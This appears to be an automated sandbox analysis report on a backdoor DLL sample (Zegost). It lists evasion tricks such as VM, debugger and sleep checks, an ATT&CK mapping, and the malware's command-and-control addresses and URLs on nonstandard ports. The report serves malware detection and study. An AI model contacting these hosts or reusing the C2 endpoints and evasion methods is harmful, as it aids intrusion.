Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_4-29821
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100086B3 rdtsc 4_2_100086B3
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 4603Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 3125Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_4-30018
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 0.0 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 0.0 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3392Thread sleep count: 48 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3404Thread sleep count: 4603 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3404Thread sleep time: -8285400000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2376Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 872Thread sleep time: -2400000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3124Thread sleep time: -2400000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 736Thread sleep time: -1440000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6384Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2376Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1656Thread sleep count: 77 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1656Thread sleep time: -23100000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1940Thread sleep time: -7200000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3404Thread sleep count: 3125 > 30Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3404Thread sleep time: -5625000000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 3600000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
Source: rundll32.exe, 00000004.00000002.3142057181.00000000033FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL!/i
Source: Amcache.hve.14.drBinary or memory string: VMware
Source: Amcache.hve.14.drBinary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: rundll32.exe, 00000004.00000002.3141581942.0000000002F6B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: s\Applications\\VMwareHo
Source: Amcache.hve.14.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.14.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.14.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \VMwareHostOpen.exes
Source: Amcache.hve.14.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3142057181.00000000033FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.14.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.drBinary or memory string: vmci.sys
Source: rundll32.exe, 00000004.00000002.3141792105.0000000003275000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: re\Classes\Applications\\VMwareHostOpen.exes\Applications\\VMwareHostOpen.exeion\\Run\User Shell Foldersockdown_Zones\45
Source: rundll32.exe, 00000004.00000003.1818277830.0000000003277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y\Machine\Software\Classes\Applications\\VMwareHostOpen.exes\Applications\\VMwareHostOpen.exeion\\Run\User Shell Foldersockdown_Zones\4
Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.14.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.drBinary or memory string: VMware20,1
Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100086B3 rdtsc 4_2_100086B3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1000CD1A LdrInitializeThunk,11_2_1000CD1A

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.232 18963Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.231 18530Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.110 18530Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 107.163.56.251 6658Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 116.133.8.92 443Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2JSGOlbNym.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: Amcache.hve.14.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.14.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.14.drBinary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Queries disk data (e.g. SMART data)
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		OS Credential Dumping1
File and Directory Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/Job11
Registry Run Keys / Startup Folder		1
Access Token Manipulation		3
Obfuscated Files or Information		LSASS Memory111
System Information Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)111
Process Injection		1
Software Packing		Security Account Manager31
Security Software Discovery		SMB/Windows Admin SharesData from Network Shared Drive11
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
Registry Run Keys / Startup Folder		1
DLL Side-Loading		NTDS31
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Masquerading		LSA Secrets1
Process Discovery		SSHKeylogging13
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
Virtualization/Sandbox Evasion		Cached Domain Credentials1
Application Window Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Access Token Manipulation		DCSync1
Remote System Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
Process Injection		Proc Filesystem1
System Network Configuration Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Rundll32		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578341 Sample: 2JSGOlbNym.dll Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 59 blogx.sina.com.cn 2->59 61 blog.sina.com.cn 2->61 63 bg.microsoft.map.fastly.net 2->63 85 Suricata IDS alerts for network traffic 2->85 87 Malicious sample detected (through community Yara rule) 2->87 89 Antivirus / Scanner detection for submitted sample 2->89 91 5 other signatures 2->91 10 loaddll32.exe 1 2->10         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        signatures3 process4 process5 16 cmd.exe 1 10->16         started        19 rundll32.exe 1 14 10->19         started        22 rundll32.exe 10->22         started        28 5 other processes 10->28 24 cmd.exe 12->24         started        26 cmd.exe 14->26         started        dnsIp6 73 Uses ping.exe to sleep 16->73 75 Uses ping.exe to check the status of other devices and networks 16->75 30 rundll32.exe 16->30         started        65 107.163.56.110, 18530, 49706 TAKE2US United States 19->65 67 107.163.56.231, 18530, 49705 TAKE2US United States 19->67 69 3 other IPs or domains 19->69 77 System process connects to network (likely due to code injection or exploit) 19->77 79 Found evasive API chain (may stop execution after checking mutex) 19->79 81 Creates an autostart registry key pointing to binary in C:\Windows 19->81 83 Queries disk data (e.g. SMART data) 22->83 33 cmd.exe 22->33         started        35 conhost.exe 24->35         started        37 PING.EXE 24->37         started        39 conhost.exe 26->39         started        41 PING.EXE 26->41         started        43 WerFault.exe 20 16 28->43         started        45 WerFault.exe 16 28->45         started        signatures7 process8 signatures9 93 Queries disk data (e.g. SMART data) 30->93 47 cmd.exe 1 30->47         started        95 Uses ping.exe to sleep 33->95 50 conhost.exe 33->50         started        52 PING.EXE 33->52         started        process10 signatures11 97 Uses ping.exe to sleep 47->97 54 PING.EXE 1 47->54         started        57 conhost.exe 47->57         started        process12 dnsIp13 71 127.0.0.1 unknown unknown 54->71

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
2JSGOlbNym.dll89%ReversingLabsWin32.Backdoor.Zegost
2JSGOlbNym.dll100%AviraTR/ATRAPS.Gen
2JSGOlbNym.dll100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    		high
    blogx.sina.com.cn
    		116.133.8.92
    		truefalse
      		high
      blog.sina.com.cn
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://107.163.56.110:18530/u1129.htmlfalse
          		high
          http://107.163.56.231:18530//joy.asp?sid=rungnejcndvgnJLgFe5vteX8v2LUicbtudb8mtiWote1mdC@true
            		unknown
            https://blog.sina.com.cn/u/5762479093false
              		high
              http://107.163.56.232:18963/main.phptrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://blog.sina.com.cn/u/5762479093.rundll32.exe, 00000004.00000003.2556967155.0000000003448000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://107.163.56.232:18963/main.phpzrundll32.exe, 00000004.00000003.2088146203.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2271435825.000000000346F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742497839.000000000346B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2331159571.000000000346F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3142349682.000000000346E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698318369.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2639896838.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2474003270.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.000000000346B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2617981049.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948233905.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003960520.000000000346B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004269504.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2618541737.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.000000000346A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948360391.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2189990128.000000000346F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2311599271.000000000346F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2087959262.0000000003470000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://107.163.56.232:18963/main.phph_Xjrundll32.exe, 00000004.00000002.3142349682.0000000003436000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://blog.sina.com.cn/u/5762479093ionrundll32.exe, 00000004.00000003.2419740054.000000000658D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://107.163.56.232:18963/main.phpsrundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://107.163.56.232:18963/main.phptrundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742497839.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698703869.000000000344A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743299996.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://107.163.56.232:18963/main.phpqrundll32.exe, 00000004.00000003.2392885098.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948233905.0000000003448000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://blog.sina.com.cn/u/5762479093)rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://107.163.56.231:18530//joy.asp?sid=rungnejcndvgnJLgFe5vteX8v2LUicbtudb8mtiWote1mdCrundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://blog.sina.com.cn/u/5762479093wsrundll32.exe, 00000004.00000003.2698703869.000000000344A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://107.163.56.232:18963/main.phpzFrundll32.exe, 00000004.00000003.2474003270.0000000003448000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://blog.sina.com.cn/u/%srundll32.exe, 00000004.00000002.3144079935.0000000005164000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://blog.sina.com.cn/u/5762479093rundll32.exe, 00000004.00000003.1880671676.0000000005164000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://107.163.56.231:18530/rundll32.exe, rundll32.exe, 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpfalse
                                            		unknown
                                            http://blog.sina.com.cn/u/5762479093W5rundll32.exe, 00000004.00000002.3142349682.0000000003446000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
